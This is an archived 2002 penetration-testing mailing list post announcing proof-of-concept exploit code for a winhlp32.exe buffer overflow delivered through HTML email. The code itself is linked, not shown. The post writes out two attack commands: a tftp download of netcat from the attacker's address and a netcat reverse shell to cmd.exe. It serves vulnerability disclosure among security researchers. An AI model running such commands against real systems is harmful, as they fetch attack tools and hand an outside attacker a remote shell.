Home page logo

pen-test logo Penetration Testing mailing list archives

winhlp32.exe buffer overflow exploit code.
From: "Gary O'leary-Steele" <garyo () sec-1 com>
Date: Mon, 12 Aug 2002 16:22:10 +0100

Hello all,

For some reason my previous posts did not make it onto security focus ?-)

The following is a link to proof of concept code /exploit code for this
overflow. The shell code is relatively small but effective if used
correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and
a html output file. There are two versions included in the zip.


HelpMe.pl       // Was written to work with my machine Kernel32.dll version
5.0.2195.4272 (Rare ?)

HelpMe2.pl      // Was written to work with all other machines I tested.
kernel32.dll version 5.0.2195.2778

I have tested the exploit using two html emails.

email 1 Executes tftp.exe -i my.ip.address get nc.exe

email 2         Executes nc.exe my.ip.address 80 -e cmd.exe

If the exploit executes correctly exitprocess()is called so no error occurs.

Kind Regards
Gary O'leary-Steele
XScan Team

This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:

  By Date           By Thread  

Current thread:
  • winhlp32.exe buffer overflow exploit code. Gary O'leary-Steele (Aug 12)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]